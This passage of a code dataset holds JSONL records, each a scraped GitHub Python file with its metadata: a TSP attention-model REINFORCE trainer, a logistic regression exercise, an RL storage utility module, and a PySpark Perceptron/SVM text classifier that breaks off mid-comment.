{"api_name": "pandas.core", "line_number": 1799, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 1803, "usage_type": "call"}, {"api_name": "pandas.core", "line_number": 1803, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 1808, "usage_type": "call"}, {"api_name": "pandas.core", "line_number": 1808, "usage_type": "attribute"}, {"api_name": "shuffle.shuffle", "line_number": 1870, "usage_type": "call"}, {"api_name": "{'shuffle': 'shuffle.shuffle'}", "line_number": 1880, "usage_type": "call"}, {"api_name": "shuffle.shuffle", "line_number": 1936, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1946, "usage_type": "attribute"}, {"api_name": "base.tokenize", "line_number": 1987, "usage_type": "call"}, {"api_name": "compatibility.apply", "line_number": 1991, "usage_type": "name"}, {"api_name": "toolz.merge", "line_number": 2008, "usage_type": "call"}, {"api_name": "compatibility.unicode", "line_number": 2024, "usage_type": "name"}, {"api_name": "collections.Iterable", "line_number": 2025, "usage_type": "argument"}, {"api_name": "base.tokenize", "line_number": 2048, "usage_type": "call"}, {"api_name": "compatibility.apply", "line_number": 2053, "usage_type": "name"}, {"api_name": "toolz.merge", "line_number": 2054, "usage_type": "call"}, {"api_name": "multi._maybe_align_partitions", "line_number": 2062, "usage_type": "call"}, {"api_name": "compatibility.apply", "line_number": 2070, "usage_type": "name"}, {"api_name": "toolz.merge", "line_number": 2075, "usage_type": "call"}, {"api_name": "collections.Iterator", "line_number": 2080, "usage_type": "argument"}, {"api_name": "pandas.DataFrame", "line_number": 2084, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 2086, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 2087, "usage_type": "call"}, {"api_name": "pandas.Categorical", "line_number": 2100, "usage_type": "call"}, {"api_name": "base.compute", "line_number": 2118, "usage_type": "call"}, {"api_name": "toolz.partial", "line_number": 2120, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 2136, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 2149, "usage_type": "call"}, {"api_name": "base.tokenize", "line_number": 2150, "usage_type": "call"}, {"api_name": "{'to_bag': 'io.to_bag'}", "line_number": 2154, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 2154, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 2157, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 2157, "usage_type": "call"}, {"api_name": "dask.array.percentile._percentile", "line_number": 2160, "usage_type": "name"}, {"api_name": "dask.array.percentile.merge_percentiles", "line_number": 2166, "usage_type": "name"}, {"api_name": "toolz.merge", "line_number": 2168, "usage_type": "call"}, {"api_name": "utils.pseudorandom", "line_number": 2192, "usage_type": "call"}, {"api_name": "toolz.unique", "line_number": 2237, "usage_type": "call"}, {"api_name": "pprint.pformat", "line_number": 2336, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 2337, "usage_type": "attribute"}, {"api_name": "base.tokenize", "line_number": 2368, "usage_type": "call"}, {"api_name": "toolz.merge", "line_number": 2374, "usage_type": "call"}, {"api_name": "pandas.core", "line_number": 2376, "usage_type": "attribute"}, {"api_name": "utils.shard_df_on_index", "line_number": 2378, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 2380, "usage_type": "attribute"}, {"api_name": "{'_maybe_align_partitions': 'multi._maybe_align_partitions', 'set_index': 'shuffle.set_index', 'set_partition': 'shuffle.set_partition', 'to_castra': 'io.to_castra', 'to_bag': 'io.to_bag', 'merge': 'multi.merge'}", "line_number": 2381, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 2382, "usage_type": "attribute"}, {"api_name": "{'to_bag': 'io.to_bag'}", "line_number": 2383, "usage_type": "call"}, {"api_name": "toolz.partial", "line_number": 2412, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 2424, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 2444, "usage_type": "attribute"}]} +{"seq_id": "9253023309", "text": "import sys\nimport warnings\n\nimport gymnasium as gym\n\nimport combinatorial_problems\nimport torch\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nfrom AttentionModel import REINFORCE, AttentionModel\n\nimport tqdm\n\nwarnings.filterwarnings(\"ignore\")\n\nnodes = 20\n\ntotal_episodes = 1_000\n\ndevice = 'cuda'\n\ntorch.autograd.set_detect_anomaly(True)\n\n# Attention Model Parameters\nd_m = 128\nd_c = d_m * 2\nd_k = 128\nh = 8\nN = 3\nd_ff = 128\nn_nodes = nodes\nembeder = 2\nd_v = 128\nc = 10.\nhead_split = True\ndropout = 0.\nuse_graph_emb = True\n\nsamples = 1_024\nbatches = 512\nepochs = 10\nepochs *= 1_250 #\n\nassert samples % batches == 0, f\"Number of samples is not divisible by specified batches: {samples} % {batches} = {samples % batches}.\"\n# List of environments. Use .reset({\"new\": False}) to reuse same environment. Useful for Training, Validation comparisons\n# We reset them here already, as we want to keep the unique graphs generated here.\nbatched_envs = [\n gym.vector.make(\"combinatorial_problems/TravelingSalesman-v0\",\n num_nodes=nodes,\n num_envs=batches,\n new_on_reset=False) for batch in range(samples // batches)\n]\n\nrewards_over_epochs = []\n\nagent = AttentionModel(d_m=d_m,\n d_c=d_c,\n d_k=d_k,\n h=h,\n N=N,\n d_ff=d_ff,\n n_nodes=n_nodes,\n embeder=embeder,\n d_v=d_v,\n c=c,\n head_split=head_split,\n dropout=dropout,\n use_graph_emb=use_graph_emb,\n batches=batches).to(device)\nam_REINFORCE = REINFORCE(policy=agent,\n optimizer=torch.optim.AdamW,\n lr=1e-4,\n gamma=0.99,\n beta=0.9,\n gradient_clip=(1., torch.inf),\n eps=1e-9).to(device)\nfor epoch in range(epochs):\n rewards_over_batches = []\n for env in tqdm.tqdm(batched_envs, file=sys.stdout):\n # Apply seeds\n state, info = env.reset()\n start_idx = info[\"agent_start_idx\"]\n done = False\n batch_rewards = 0\n while not done:\n # graph -> b x n_nodes x coords\n graph_nodes = np.stack(info[\"nodes\"])\n graph = torch.FloatTensor(graph_nodes).reshape(batches, nodes, 2).to(device)\n # The context will be the concatenation of the node embeddings for first and last nodes.\n # use am_REINFORCE.policy.encode\n # tmb_emb -> b x nodes x d_m\n tmp_emb = am_REINFORCE.policy.encoder(graph).detach()\n # start/end_node -> b x 1 x d_m\n start_node = tmp_emb[np.arange(batches),start_idx,:].unsqueeze(1)\n end_node = tmp_emb[np.arange(batches),start_idx,:].unsqueeze(1)\n # ctxt -> b x 1 x d_c (2 * d_m)\n ctxt = torch.cat([start_node, end_node], dim=-1)\n # For now, I will not use a mask for the embedding input.\n # mask_emb_graph -> b x 1 x nodes\n mask_emb_graph = torch.zeros(batches, 1, nodes).bool().to(device) # Empty Mask!\n # mask_dex_graph -> b x 1 x nodes\n masks = np.stack(info[\"mask\"])\n mask_dec_graph = torch.tensor(masks).unsqueeze(1).to(device)\n reuse_embeding = False\n\n action = am_REINFORCE(graph=graph,\n ctxt=ctxt,\n mask_emb_graph=mask_emb_graph,\n mask_dec_graph=mask_dec_graph,\n reuse_embeding=reuse_embeding,\n explore=True).numpy()\n state, reward, terminated, truncated, info = env.step(action)\n am_REINFORCE.rewards.append(reward)\n batch_rewards += reward\n done = terminated.all() or truncated.all()\n rewards_over_batches.append(np.array(batch_rewards).mean())\n am_REINFORCE.update()\n rewards_over_epochs.append(np.mean(np.array(rewards_over_batches)))\n if epoch % 1 == 0:\n avg_reward = np.mean(rewards_over_epochs[-1:])\n print(f\"Epoch: {epoch} with Average Reward {avg_reward} for last epoch\",)\n\n# Maybe add testing, using argmax!\n# Why is the plotted graph different from what is being reported?\n\nrewards_to_plot = [[batch_r] for batch_r in rewards_over_epochs]\ndf1 = pd.DataFrame(rewards_to_plot, columns=[\"Train\"]).plot()\nplt.title(\"Attention Model Training.\")\nplt.xlabel(\"Epochs\")\nplt.ylabel(\"Rewards\")\nplt.xticks(range(epochs))\nplt.show()\n\nfor env in batched_envs:\n env.close()\n del env", "repo_name": "aguilarjose11/PytorchAMD", "sub_path": "AM_TSP.py", "file_name": "AM_TSP.py", "file_ext": "py", "file_size_in_byte": 4775, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "warnings.filterwarnings", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.autograd.set_detect_anomaly", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 25, "usage_type": "attribute"}, {"api_name": "gymnasium.vector.make", "line_number": 51, "usage_type": "call"}, {"api_name": "gymnasium.vector", "line_number": 51, "usage_type": "attribute"}, {"api_name": "AttentionModel.AttentionModel", "line_number": 59, "usage_type": "call"}, {"api_name": "AttentionModel.REINFORCE", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 74, "usage_type": "attribute"}, {"api_name": "torch.inf", "line_number": 78, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 82, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 82, "usage_type": "attribute"}, {"api_name": "numpy.stack", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 100, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 123, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 131, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}]} +{"seq_id": "11881718080", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.optimize import minimize\r\nimport scipy.io\r\nfrom numpy.random import default_rng\r\n\r\ndef sigmoid(z):\r\n '''\r\n\r\n Parameters\r\n ----------\r\n z : float or np array\r\n\r\n Returns\r\n -------\r\n g : sigmoid function, evaluated pointwise on the array\r\n\r\n '''\r\n g = np.zeros(z.size)\r\n g = 1/(1+np.exp(-z))\r\n return g\r\n\r\ndef costFunctionReg(theta,X,y,lamb):\r\n '''\r\n \r\n\r\n Parameters\r\n ----------\r\n theta : logistic regression model parameters\r\n X : mxn numpy array containing m training points and a n features\r\n y : size m array containing the responses of the training data\r\n lamb : logistic regression regularization parameter\r\n\r\n Returns\r\n -------\r\n J : the cost function for the regularized logistic regression model\r\n grad : gradient of the regularized logistic regression model\r\n\r\n '''\r\n m = y.shape[0]\r\n J = 0 \r\n grad = np.zeros(theta.shape[0])\r\n h = sigmoid(np.matmul(X,theta))\r\n lambvec = lamb*np.ones(theta.shape[0])\r\n lambvec[0]=0\r\n J = 1/m*(-np.matmul(y,np.log(h))-np.matmul(1-y,np.log(1-h)))+1/(2*m)*np.sum(lambvec*theta**2)\r\n grad = 1/m*np.matmul(X.T,h-y)+1/m*lambvec*theta\r\n return (J,grad)\r\n\r\ndef plotmnist(X,m=10,n=10):\r\n\tfig, axs = plt.subplots(m, n)\r\n\tl = max(m,n)\r\n\tif m>=n:\r\n\t\tfor k in range(m*n):\r\n\t\t\taxs[k%l,k//l].imshow(X[k].reshape((20,20)).T,cmap='gray')\r\n\t\t\t#axs[k%l,k//l].set_title(y_train[k+offset])\r\n\t\t\taxs[k%l,k//l].axes.xaxis.set_ticks([])\r\n\t\t\taxs[k%l,k//l].axes.yaxis.set_ticks([])\r\n\telse:\r\n\t\tfor k in range(m*n):\r\n\t\t\taxs[k//l,k%l].imshow(X[k].reshape((20,20)).T,cmap='gray')\r\n\t\t\t#axs[k//l,k%l].set_title(y_train[k+offset])\r\n\t\t\taxs[k//l,k%l].axes.xaxis.set_ticks([])\r\n\t\t\taxs[k//l,k%l].axes.yaxis.set_ticks([])\r\n\tplt.show()\r\n\r\ndef oneVsAll(X,y,num_labels,lamb):\r\n m = X.shape[0]\r\n n = X.shape[1]\r\n \r\n all_theta = np.zeros((num_labels,n))\r\n \r\n for c in range(1,11):\r\n initial_theta = np.zeros(n)\r\n costfunc = lambda theta: costFunctionReg(theta=theta,X=X,y=(y==c),lamb=lamb)[0]\r\n costgrad = lambda theta: costFunctionReg(theta=theta,X=X,y=(y==c),lamb=lamb)[1]\r\n \r\n res = minimize(costfunc, initial_theta, method='BFGS', jac=costgrad,\r\n options={'gtol': 1e-6, 'disp': True})\r\n \r\n all_theta[c-1] = res.x\r\n \r\n return all_theta\r\n \r\n \r\ndef predictOneVsAll(theta,X):\r\n m = X.shape[0]\r\n num_labels = theta.shape[0]\r\n p = np.zeros(X.shape[0])\r\n \r\n p = np.argmax(sigmoid(np.matmul(theta,X.T)),axis=0)+1\r\n return p\r\n\r\ndef main():\r\n input_layer_size = 4000\r\n num_labels = 10\r\n data = scipy.io.loadmat('ex3data1-pythoncompatible.mat')\r\n data = data[\"data\"][0][0]\r\n X = data[0]\r\n y = data[1]\r\n y = y.reshape((y.shape[0],))\r\n rng = default_rng(123)\r\n to_print = rng.integers(5000,size=100)\r\n plotmnist(X=X[to_print])\r\n \r\n X = np.column_stack((np.ones(X.shape[0]),X))\r\n \r\n theta = oneVsAll(X,y,num_labels,0.1)\r\n \r\n predictions = predictOneVsAll(theta,X)\r\n print('Train accuracy: {acc}'.format(acc= np.mean(predictions==y)*100))\r\n\r\nif __name__ == \"__main__\":\r\n main()", "repo_name": "nikolayhristov/Coursera-ML-Python", "sub_path": "Ex3/ex3.py", "file_name": "ex3.py", "file_ext": "py", "file_size_in_byte": 3213, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.zeros", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 74, "usage_type": "call"}, {"api_name": "scipy.optimize.minimize", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 91, "usage_type": "call"}, {"api_name": "scipy.optimize.io.loadmat", "line_number": 97, "usage_type": "call"}, {"api_name": "scipy.optimize.io", "line_number": 97, "usage_type": "attribute"}, {"api_name": "scipy.optimize", "line_number": 97, "usage_type": "name"}, {"api_name": "numpy.random.default_rng", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.column_stack", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 111, "usage_type": "call"}]} +{"seq_id": "24978114953", "text": "import csv\nimport os\nimport torch\nimport logging\nimport sys\n\nimport utils\nfrom .other import device\n\n\ndef create_folders_if_necessary(path):\n dirname = os.path.dirname(path)\n if not os.path.isdir(dirname):\n os.makedirs(dirname)\n\n\ndef get_storage_dir():\n if \"RL_STORAGE\" in os.environ:\n return os.environ[\"RL_STORAGE\"]\n return \"storage\"\n\n\ndef get_model_dir(model_name):\n return os.path.join(get_storage_dir(), model_name)\n\n\ndef get_status_path(model_dir, i=None):\n if i is None or i == 'NEW':\n mode = i\n unnumbered_path = os.path.join(model_dir, 'status.pt')\n if os.path.exists(unnumbered_path):\n return unnumbered_path\n i = 0\n while os.path.exists(os.path.join(model_dir, 'status_%i.pt'%i)):\n i += 1\n \n if mode is None:\n i -= 1\n \n return os.path.join(model_dir, \"status_%i.pt\"%i)\n\n\ndef get_status(model_dir, i=None):\n path = get_status_path(model_dir, i=i)\n data = torch.load(path, map_location=device)\n print('Loaded status from %s'%path)\n return data\n\n\ndef save_status(status, model_dir, i):\n path = get_status_path(model_dir, i)\n utils.create_folders_if_necessary(path)\n torch.save(status, path)\n\n\ndef get_vocab(model_dir):\n return get_status(model_dir)[\"vocab\"]\n\n\ndef get_model_state(model_dir, i=None):\n return get_status(model_dir, i=i)[\"model_state\"]\n\n\ndef get_txt_logger(model_dir):\n path = os.path.join(model_dir, \"log.txt\")\n utils.create_folders_if_necessary(path)\n\n logging.basicConfig(\n level=logging.INFO,\n format=\"%(message)s\",\n handlers=[\n logging.FileHandler(filename=path),\n logging.StreamHandler(sys.stdout)\n ]\n )\n\n return logging.getLogger()\n\n\ndef get_csv_logger(model_dir):\n csv_path = os.path.join(model_dir, \"log.csv\")\n utils.create_folders_if_necessary(csv_path)\n csv_file = open(csv_path, \"a\")\n return csv_file, csv.writer(csv_file)\n", "repo_name": "aaronwalsman/impossibly-good", "sub_path": "utils/storage.py", "file_name": "storage.py", "file_ext": "py", "file_size_in_byte": 1981, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 14, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 45, "usage_type": "call"}, {"api_name": "other.device", "line_number": 45, "usage_type": "name"}, {"api_name": "utils.create_folders_if_necessary", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "utils.create_folders_if_necessary", "line_number": 66, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 68, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 69, "usage_type": "attribute"}, {"api_name": "logging.FileHandler", "line_number": 72, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 73, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 73, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "utils.create_folders_if_necessary", "line_number": 82, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 84, "usage_type": "call"}]} +{"seq_id": "36646417598", "text": "from __future__ import print_function\nimport sys\nimport re\nfrom operator import add\nimport numpy as np \n\nfrom pyspark import SparkContext\nfrom datetime import datetime\n\nif __name__ == \"__main__\":\n\n\tsc = SparkContext(appName=\"Project-task1\")\n\n\t# Note down the current time for calculation of time\n\tstartingTime = datetime.now()\n\n\t#########################################################################################\n\t#################### 1. Read the training dataset and preprocess it ####################\n\t#########################################################################################\n\n\t# Read the training dataset \n\td_corpus = sc.textFile(sys.argv[1])\n\n\t# Each entry in validLines will be a line from the text file\n\tvalidDocLines = d_corpus.filter(lambda x : 'id' in x and 'url=' in x)\n\n\t# Now, we transform it into a set of (docID, text) pairs\n\tkeyAndText = validDocLines.map(lambda x : (x[x.index('id=\"') + 4 : x.index('\" url=')], x[x.index('\">') + 2:][:-6])) \n\n\t# leveraged the code from assignment 2\n\t# remove all non letter characters\n\tregex = re.compile('[^a-zA-Z]')\n\tkeyAndWordsList = keyAndText.map(lambda x : (str(x[0]), regex.sub(' ', x[1]).lower().split()))\n\n\t# Get the top 20,000 words... first change (docID, [\"word1\", \"word2\", \"word3\", ...])\n\t# to (\"word1\", 1) (\"word2\", 1)...\n\tconslidatedWords = keyAndWordsList.flatMap(lambda x: x[1]).map(lambda x: (x,1))\n\n\t# Count all of the words, giving us (\"word1\", 1433), (\"word2\", 3423423), etc.\n\tallCounts = conslidatedWords.reduceByKey(add)\n\n\t# Get the top 20,000 words in a local array in a sorted format based on frequency\n\ttopWordsinDict = allCounts.top(20000, key = lambda x : x[1])\n\n\t# We'll create a RDD that has a set of (word, dictNum) pairs\n\t# start by creating an RDD that has the number 0 through 20000\n\t# 20000 is the number of words that will be in our dictionary\n\ttop20000Words = sc.parallelize(range(20000))\n\n\t# Now, we transform (0), (1), (2), ... to (\"MostCommonWord\", 1)\n\t# (\"NextMostCommon\", 2), ...\n\t# the number will be the spot in the dictionary used to tell us\n\t# where the word is located\n\tdictionary = top20000Words.map (lambda x : (topWordsinDict[x][0], x))\n\n\n\t#########################################################################################\n\t#################### 1.1 FEATURE REDUCTION ####################\n\t#########################################################################################\n\n\t# min-max normalization for converting the regression coefficients to probability range of (0 to 1)\n\n\t# Read the Regression coefficients generated in assignment 4 - task 2\n\t# Leverage the regression coefficients genereated by task2 (model training) to make the prediction\n\t# Open the file containing regression coefficients and read it\n\tfilePathOutputTask2Assignment4 =sc.textFile(sys.argv[2])\n\n\t# Extract out all of the lines present in the output of task 2\n\ttask2Lines = filePathOutputTask2Assignment4.map(lambda x: x.split(\",\"))\n\n\t# Extract the line containing the regression coefficients and remove '[' and ']' from the extremes\n\tlistOfLines = task2Lines.collect()[10]\n\tlistOfLines[0] = listOfLines[0][1:]\n\tlistOfLines[len(listOfLines)-1] = listOfLines[len(listOfLines)-1][:len(listOfLines[len(listOfLines)-1])-2]\n\n\t# Convert the list of regression coefficients to numpy array to be used as an input for using probability vector\n\tregressionCoefficientsGeneratedInAssignment4Task2 = np.array(listOfLines, dtype = np.float64 )\n\n\t# Extract the line containing the weight Initialization coefficients and remove '[' and ']' from the extremes\n\tlistOfLines = task2Lines.collect()[12]\n\tlistOfLines[0] = listOfLines[0][1:]\n\tlistOfLines[len(listOfLines)-1] = listOfLines[len(listOfLines)-1][:len(listOfLines[len(listOfLines)-1])-2]\n\n\t# Convert the list of regression coefficients to numpy array to be used as an input for using probability vector\n\tweightInitializationForPerceptron = np.array(listOfLines, dtype = np.float64 )\n\n\tp = np.zeros(20000)\n\t# max value for a probability is 1\n\t# maxValue = np.ones(20000)\n\tmaxValue = np.amax(regressionCoefficientsGeneratedInAssignment4Task2)\n\n\t# minValue of probability is 0\n\t# minValue = np.zeros(20000)\n\tminValue = np.amin(regressionCoefficientsGeneratedInAssignment4Task2)\n\n\t# min-max normalization formula -> (x-min)/(max-min)\n\tnumerator = np.subtract(regressionCoefficientsGeneratedInAssignment4Task2, minValue)\n\tdenominator = np.subtract(maxValue, minValue)\n\n\tp = np.divide(numerator, denominator)\n\n\t# Select and extract out 10000 features based on the probability. Probability is more for word indexes that had larger regression coefficients in Assignment 4 task 2\n\tfeatureSelection = np.random.choice(np.arange(20000), 10000, replace = False)\n\n\n\t# Build new dictionary of 10000 words or features \n\tdictionary = dictionary.filter(lambda x: x[1] in featureSelection).map(lambda x: x[0]).zipWithIndex()\n\n\t# The following function gets a list of dictionaryPos values,\n\t# and then creates a TF vector\n\t# corresponding to those values... for example,\n\t# if we get [3, 4, 1, 1, 2] we would in the\n\t# end have [0, 2/5, 1/5, 1/5, 1/5] because 0 appears zero times,\n\t# 1 appears twice, 2 appears once, etc.\n\n\tdef buildArray(listOfIndices):\n\t \n\t returnVal = np.zeros(10000)\n\t \n\t for index in listOfIndices:\n\t returnVal[index] = returnVal[index] + 1\n\t \n\t mysum = np.sum(returnVal)\n\t \n\t returnVal = np.divide(returnVal, mysum)\n\t \n\t return returnVal\n\t \n\t# Next, we get a RDD that has, for each (docID, [\"word1\", \"word2\", \"word3\", ...]),\n\t# (\"word1\", docID), (\"word2\", docId), ...\n\tallWordsWithDocID = keyAndWordsList.flatMap(lambda x: ((j, x[0]) for j in x[1]))\n\n\t# Now join and link them, to get a set of (\"word1\", (dictionaryPos, docID)) pairs\n\tallDictionaryWords = dictionary.join(allWordsWithDocID)\n\n\t# Now, we drop the actual word itself to get a set of (docID, dictionaryPos) pairs\n\tjustDocAndPos = allDictionaryWords.map(lambda x: (x[1][1],x[1][0]))\n\n\t# Now get a set of (docID, [dictionaryPos1, dictionaryPos2, dictionaryPos3...]) pairs\n\tallDictionaryWordsInEachDoc = justDocAndPos.groupByKey()\n\n\t# The following line this gets us a set of\n\t# (docID, [dictionaryPos1, dictionaryPos2, dictionaryPos3...]) pairs\n\t# and converts the dictionary positions to a bag-of-words numpy array...\n\tallDocsAsNumpyArrays = allDictionaryWordsInEachDoc.map(lambda x: (x[0], buildArray(x[1])))\n\n\t# Now, create a version of allDocsAsNumpyArrays where, in the array,\n\t# every entry is either zero or one.\n\t# A zero means that the word does not occur,\n\t# and a one means that it does.\n\tzeroOrOne = allDocsAsNumpyArrays.map(lambda x: (x[0],np.where(x[1] > 0, 1, 0)))\n\n\t# For SVM\n\t# Function to generate labels for each document - Document with AU id --> 1, else --> 0\n\tdef getLabelSVM(x):\n\t if x[:2] == 'AU':\n\t return 1\n\n\t else:\n\t return -1\n\n\t# For Perceptron\n\t# Function to generate labels for each document - Document with AU id --> 1, else --> 0\n\tdef getLabelPerceptron(x):\n\t if x[:2] == 'AU':\n\t return 1\n\n\t else:\n\t return 0\n\n\n\t# Generate RDD containing - x[0] -> label and x[1] -> 10000 features\n\tyLabelAndXFeaturesPerceptron = zeroOrOne.map(lambda x: (getLabelPerceptron(x[0]),x[1]))\n\ttrainingDataPerceptron = yLabelAndXFeaturesPerceptron\n\n\t# Generate Label and features for SVM containing - x[0] -> label and x[1] -> 10000 features\n\tyLabelAndXFeaturesSVM = zeroOrOne.map(lambda x: (getLabelSVM(x[0]),x[1]))\n\ttrainingDataSVM = yLabelAndXFeaturesSVM\n\n\t# Cache the RDD containing labels and features extracted out of training data for Perceptron\n\ttrainingDataPerceptron.cache()\n\n\t# Cache the RDD containing labels and features extracted out of training data for SVM\n\ttrainingDataSVM.cache()\n\t\n\n\t# Count number of rows\n\tn = float( trainingDataSVM.count())\n\t# End of preprocessing of training data\n\n\t# \n\tTrainingDatasetetPreprocessingCompletionTime = datetime.now()\n\ttimeToReadTrainDataAndPreProcess = TrainingDatasetetPreprocessingCompletionTime - startingTime\n\n\t#######################################################################################\n\t#################### 2.1 Train the Perceptron Model ##########################\n\t#######################################################################################\n\n\tprint('\\n',\"### PERCEPTRON MODEL's training started.........\",'\\n')\n\n\t# Initialize the different variables\n\tnumberOfFeatures = 10000\n\tlearningRate = 100\n\tweights = weightInitializationForPerceptron\n\t# weights = np.zeros(numberOfFeatures)\n\t# bias = 0\n\t# bias = 155000\n\tbias = 214200\n\t# bias = 246100\n\tgradients = np.zeros(numberOfFeatures)\n\ttotalNumberOfIterations = 400\n\tcurrentIteration = 0\n\tlistOfTrainingError = []\n\toldTrainingError = float('inf')\n\n\twhile (currentIteration < totalNumberOfIterations):\n\n\t\t# Calculate the linear output using perceptron: RDD contains x[0] -> actual output, x[1] --> Input numpy vector, x[2] --> Calculated linear output\n\t\tlinearOutput = trainingDataPerceptron.map(lambda x: (x[0],x[1], (np.dot(weights, x[1]) + bias )))\n\n\t\t# Find the predicted label using the Unit Step activation funciton\n\n\t\t# Definition of Unit Step Function:\n\t\t# if input >= 0:\n\t\t#\tOutput_label = 1\n\t\t# else:\n\t\t#\tOutput_label = 0 \n\t\tyPredicted = linearOutput.map(lambda x: ( x[0], x[1], np.heaviside(x[2],1)))\n\n\t\t# Get feedback and Calcuate the values that will be used to update weights and bias\n\t\t# Feedback is 